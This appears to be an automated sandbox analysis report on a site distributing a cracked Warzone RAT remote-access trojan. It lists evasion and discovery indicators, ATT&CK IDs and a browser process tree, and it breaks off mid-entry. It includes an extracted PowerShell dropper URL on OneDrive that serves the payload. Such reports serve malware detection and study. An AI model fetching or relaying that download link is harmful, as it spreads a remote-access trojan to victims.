warzonerat | hxxp://hackingvip[.]com

Analysis

max time kernel
247s
max time network
250s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250128-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
31/01/2025, 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://hackingvip.com

Score

10^/10

warzonerat defense_evasion discovery infostealer rat themida trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://onedrive.live.com/download?cid=C7F050ABA6D0F6B7&resid=C7F050ABA6D0F6B7%21105&authkey=AIPYamsd38clFVs

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3864 created 3668	3864	WARZONE-RAT 3.03 Cracked.exe	57
PID 2536 created 3668	2536	WARZONE-RAT 3.03 Cracked.exe	57

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Warzonerat family
warzonerat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WARZONE-RAT 3.03 Cracked.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WARZONE RAT 3.03 Cracked.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WARZONE-RAT 3.03 Cracked.exe

Warzone RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0007000000027ea6-612.dat	warzonerat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
159	3264	powershell.exe
161	3264	powershell.exe
164	3264	powershell.exe
172	2076	powershell.exe
173	2076	powershell.exe
175	2076	powershell.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WARZONE RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WARZONE RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WARZONE-RAT 3.03 Cracked.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000\Control Panel\International\Geo\Nation	WARZONE-RAT 3.03 Cracked.exe

Executes dropped EXE 5 IoCs

pid	Process
3864	WARZONE-RAT 3.03 Cracked.exe
5104	WARZONE-RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe
2536	WARZONE-RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe

Loads dropped DLL 4 IoCs

pid	Process
3596	WARZONE RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe

Themida packer 15 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0007000000027ea8-503.dat	themida
behavioral1/memory/3864-507-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/memory/3864-508-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/files/0x0007000000027ead-524.dat	themida
behavioral1/memory/3596-604-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/3864-605-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/memory/3596-608-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/3596-607-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/3596-609-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/3596-614-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/5104-632-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/memory/3596-657-0x0000000000400000-0x0000000001411000-memory.dmp	themida
behavioral1/memory/2536-663-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/memory/2536-664-0x0000000000E50000-0x0000000002392000-memory.dmp	themida
behavioral1/memory/2536-669-0x0000000000E50000-0x0000000002392000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 3 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WARZONE RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WARZONE-RAT 3.03 Cracked.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WARZONE-RAT 3.03 Cracked.exe

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
163	icanhazip.com
164	icanhazip.com
175	icanhazip.com
192	whatismyipaddress.com
193	whatismyipaddress.com
194	whatismyipaddress.com

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
3864	WARZONE-RAT 3.03 Cracked.exe
5104	WARZONE-RAT 3.03 Cracked.exe
5104	WARZONE-RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe
5104	WARZONE-RAT 3.03 Cracked.exe
2536	WARZONE-RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3864 set thread context of 5104	3864	WARZONE-RAT 3.03 Cracked.exe	120
PID 2536 set thread context of 1264	2536	WARZONE-RAT 3.03 Cracked.exe	129

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WARZONE RAT 3.03 Cracked.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WARZONE-RAT 3.03 Cracked.exe
Key created	\REGISTRY\USER\S-1-5-21-3933156042-2316999077-2687276773-1000_Classes\Local Settings	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4344	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
1236	msedge.exe
1236	msedge.exe
524	identity_helper.exe
524	identity_helper.exe
2340	msedge.exe
2340	msedge.exe
3544	msedge.exe
3544	msedge.exe
3544	msedge.exe
3544	msedge.exe
5104	WARZONE-RAT 3.03 Cracked.exe
5104	WARZONE-RAT 3.03 Cracked.exe
3264	powershell.exe
3264	powershell.exe
3264	powershell.exe
1264	WARZONE-RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe
2076	powershell.exe
2076	powershell.exe
2076	powershell.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2896	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2896	AUDIODG.EXE
Token: SeRestorePrivilege	4356	7zG.exe
Token: 35	4356	7zG.exe
Token: SeSecurityPrivilege	4356	7zG.exe
Token: SeSecurityPrivilege	4356	7zG.exe
Token: SeRestorePrivilege	2480	7zG.exe
Token: 35	2480	7zG.exe
Token: SeSecurityPrivilege	2480	7zG.exe
Token: SeSecurityPrivilege	2480	7zG.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeIncreaseQuotaPrivilege	3264	powershell.exe
Token: SeSecurityPrivilege	3264	powershell.exe
Token: SeTakeOwnershipPrivilege	3264	powershell.exe
Token: SeLoadDriverPrivilege	3264	powershell.exe
Token: SeSystemProfilePrivilege	3264	powershell.exe
Token: SeSystemtimePrivilege	3264	powershell.exe
Token: SeProfSingleProcessPrivilege	3264	powershell.exe
Token: SeIncBasePriorityPrivilege	3264	powershell.exe
Token: SeCreatePagefilePrivilege	3264	powershell.exe
Token: SeBackupPrivilege	3264	powershell.exe
Token: SeRestorePrivilege	3264	powershell.exe
Token: SeShutdownPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeSystemEnvironmentPrivilege	3264	powershell.exe
Token: SeRemoteShutdownPrivilege	3264	powershell.exe
Token: SeUndockPrivilege	3264	powershell.exe
Token: SeManageVolumePrivilege	3264	powershell.exe
Token: 33	3264	powershell.exe
Token: 34	3264	powershell.exe
Token: 35	3264	powershell.exe
Token: 36	3264	powershell.exe
Token: SeIncreaseQuotaPrivilege	3264	powershell.exe
Token: SeSecurityPrivilege	3264	powershell.exe
Token: SeTakeOwnershipPrivilege	3264	powershell.exe
Token: SeLoadDriverPrivilege	3264	powershell.exe
Token: SeSystemProfilePrivilege	3264	powershell.exe
Token: SeSystemtimePrivilege	3264	powershell.exe
Token: SeProfSingleProcessPrivilege	3264	powershell.exe
Token: SeIncBasePriorityPrivilege	3264	powershell.exe
Token: SeCreatePagefilePrivilege	3264	powershell.exe
Token: SeBackupPrivilege	3264	powershell.exe
Token: SeRestorePrivilege	3264	powershell.exe
Token: SeShutdownPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeSystemEnvironmentPrivilege	3264	powershell.exe
Token: SeRemoteShutdownPrivilege	3264	powershell.exe
Token: SeUndockPrivilege	3264	powershell.exe
Token: SeManageVolumePrivilege	3264	powershell.exe
Token: 33	3264	powershell.exe
Token: 34	3264	powershell.exe
Token: 35	3264	powershell.exe
Token: 36	3264	powershell.exe
Token: SeIncreaseQuotaPrivilege	3264	powershell.exe
Token: SeSecurityPrivilege	3264	powershell.exe
Token: SeTakeOwnershipPrivilege	3264	powershell.exe
Token: SeLoadDriverPrivilege	3264	powershell.exe
Token: SeSystemProfilePrivilege	3264	powershell.exe
Token: SeSystemtimePrivilege	3264	powershell.exe
Token: SeProfSingleProcessPrivilege	3264	powershell.exe
Token: SeIncBasePriorityPrivilege	3264	powershell.exe
Token: SeCreatePagefilePrivilege	3264	powershell.exe
Token: SeBackupPrivilege	3264	powershell.exe
Token: SeRestorePrivilege	3264	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
4356	7zG.exe
2480	7zG.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
3824	taskmgr.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe
1236	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5104	WARZONE-RAT 3.03 Cracked.exe
3596	WARZONE RAT 3.03 Cracked.exe
1264	WARZONE-RAT 3.03 Cracked.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 2044	1236	msedge.exe	83
PID 1236 wrote to memory of 2044	1236	msedge.exe	83
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 1948	1236	msedge.exe	84
PID 1236 wrote to memory of 3360	1236	msedge.exe	85
PID 1236 wrote to memory of 3360	1236	msedge.exe	85
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86
PID 1236 wrote to memory of 216	1236	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://hackingvip.com
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa12db46f8,0x7ffa12db4708,0x7ffa12db4718
    3⤵
    PID:2044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
    3⤵
    PID:1948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
    3⤵
    PID:216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
    3⤵
    PID:5024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    3⤵
    PID:1840
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
    3⤵
    PID:1560
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1976 /prefetch:8
    3⤵
    PID:1696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
    3⤵
    PID:1616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1804 /prefetch:1
    3⤵
    PID:2876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
    3⤵
    PID:564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
    3⤵
    PID:4484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
    3⤵
    PID:3624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
    3⤵
    PID:1688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
    3⤵
    PID:3596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
    3⤵
    PID:3240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
